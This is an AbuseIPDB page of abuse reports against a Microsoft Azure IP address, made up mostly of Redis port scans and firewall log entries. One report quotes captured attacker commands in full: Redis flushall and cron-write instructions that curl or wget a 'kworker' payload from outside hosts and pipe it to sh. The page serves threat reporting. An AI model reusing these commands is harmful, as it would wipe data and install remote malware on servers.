JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 20.8.140.238

20.8.140.238 was found in our database!

This IP was reported 33 times. Confidence of Abuse is 2%: ?

ISP	Microsoft Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇳🇱 Netherlands
City	Amsterdam, North Holland

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 20.8.140.238

Whois 20.8.140.238

IP Abuse Reports for 20.8.140.238:

This IP address has been reported a total of 33 times from 28 distinct sources. 20.8.140.238 was first reported on February 27th 2026, and the most recent report was 1 week ago.

Old Reports: The most recent abuse report for this IP address is from 1 week ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-06-02 09:32:56 (1 week ago)	React.Server.Components.react-flight.Remote.Code.Execution	Exploited Host
🇩🇪 dpsbs	2026-03-12 11:40:45 (2 months ago)	multiple ips intrustions detected	Hacking
🇦🇹 centurion	2026-03-11 18:40:35 (2 months ago)	Unauthorized attempt on siem [6379/tcp] Source port: 28736 TTL: 47 Packet length: 60 TOS: 0x00 https ... show more Unauthorized attempt on siem [6379/tcp] Source port: 28736 TTL: 47 Packet length: 60 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇦🇹 Pingger Shikkoken	2026-03-11 18:40:35 (2 months ago)	2026-03-11T18:40:35+00:00 iskariot kernel: AbuseIPDB-Blacklist-Dropped: IN=ens3 OUT= MAC=b6:ab:74:e6 ... show more 2026-03-11T18:40:35+00:00 iskariot kernel: AbuseIPDB-Blacklist-Dropped: IN=ens3 OUT= MAC=b6:ab:74:e6:2e:14:84:03:28:62:88:32:08:00 SRC=20.8.140.238 DST=152.53.50.28 LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=13265 DF PROTO=TCP SPT=28736 DPT=6379 WINDOW=64240 RES=0x00 SYN URGP=0 show less	Hacking
🇨🇦 polycoda	2026-03-11 14:29:34 (2 months ago)	📡 Port scan	Hacking Web App Attack
🇬🇧 andypiper	2026-03-09 02:02:50 (3 months ago)	CrowdSec ban for AbuseIPDB Top List	Brute-Force Web App Attack
🇫🇷 Duggy_Tuxy🧱	2026-03-09 00:46:11 (3 months ago)	[wb-sw-al] Blocked by SysWarden Firewall (NoSQL/Cache Attack Port 6379)	Port Scan Hacking Exploited Host
🇯🇵 jay hung	2026-03-07 02:43:50 (3 months ago)	2026-03-07T02:43:46.955959+00:00 quarktech kernel: [1780197.807923] [UFW BLOCK] IN=eth0 OUT= MAC=22: ... show more 2026-03-07T02:43:46.955959+00:00 quarktech kernel: [1780197.807923] [UFW BLOCK] IN=eth0 OUT= MAC=22:00:92:2e:84:93:fe:ff:ff:ff:ff:ff:08:00 SRC=20.8.140.238 DST=172.237.29.33 LEN=60 TOS=0x00 PREC=0x40 TTL=37 ID=32518 DF PROTO=TCP SPT=57664 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇫🇷 Duggy_Tuxy🧱	2026-03-07 02:39:54 (3 months ago)	[wb-sw-al] Blocked by SysWarden Firewall (NoSQL/Cache Attack Port 6379)	Port Scan Hacking Exploited Host
🇺🇸 drewf.ink	2026-03-07 02:32:29 (3 months ago)	[02:32] Port scanning. Port(s) scanned: TCP/6379	Port Scan
🇷🇺 genokrad	2026-03-06 19:38:46 (3 months ago)	Unauthorized connection attempt on TCP/6379 (Redis)	Port Scan
🇬🇷 Xev	2026-03-06 10:00:51 (3 months ago)	Redis command execution Date: 2026-03-06 09:02:52 UTC Destination port: 6379 Executed commands: fl ... show more Redis command execution Date: 2026-03-06 09:02:52 UTC Destination port: 6379 Executed commands: flushall set backup1 /2 * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup4 /5 * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh config set dir /var/spool/cron/ config set dir /var/spool/cron/crontabs flushall set backup1 /2 * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker \| sh set backup4 /5 * * * root wd1 -q -O- http://34.70.205.211... show less	IoT Targeted
🇯🇵 VXG-NET	2026-03-06 07:52:30 (3 months ago)	port=6379, indicator_type=scan	Port Scan
🇺🇸 donarev419	2026-03-06 00:39:42 (3 months ago)	Connection to port 6379 with data transfer. Data preview: *1 $4 info	Port Scan Hacking
Anonymous	2026-03-05 17:41:13 (3 months ago)	2026-03-05T18:41:12.460870+01:00 vps kernel: [34472720.257208] [PORTSCAN DETECTED] IN=ens3 OUT= MAC= ... show more 2026-03-05T18:41:12.460870+01:00 vps kernel: [34472720.257208] [PORTSCAN DETECTED] IN=ens3 OUT= MAC=fa:16:3e:66:f6:24:02:37:19:0d:c2:f3:08:00 SRC=20.8.140.238 DST=54.37.14.118 LEN=60 TOS=0x00 PREC=0x00 TTL=41 ID=47039 DF PROTO=TCP SPT=57664 DPT=6379 WINDOW=64240 RES=0x00 SYN URGP=0 ... show less	Port Scan Brute-Force

Showing 1 to 15 of 33 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇩 2404:c0:c202:2846:a162:24cc:8ca9:c8de

🇭🇰 150.5.154.160

🇨🇳 106.13.107.35

🇺🇸 64.62.197.227

🇨🇭 209.99.190.113

🇳🇱 185.242.226.9

🇨🇳 175.170.144.18

🇺🇸 162.216.149.63

🇨🇳 118.183.180.108

🇨🇳 106.38.195.164

🇻🇳 103.228.36.205

🇬🇧 92.207.4.157

🇫🇷 91.231.89.251

🇺🇸 66.228.53.46

🇳🇱 45.148.10.151

🇻🇳 42.117.145.12

🇺🇸 12.24.33.194

🇺🇸 2604:a940:301:225:0:18::

🇨🇳 180.153.236.204

🇳🇱 172.217.40.26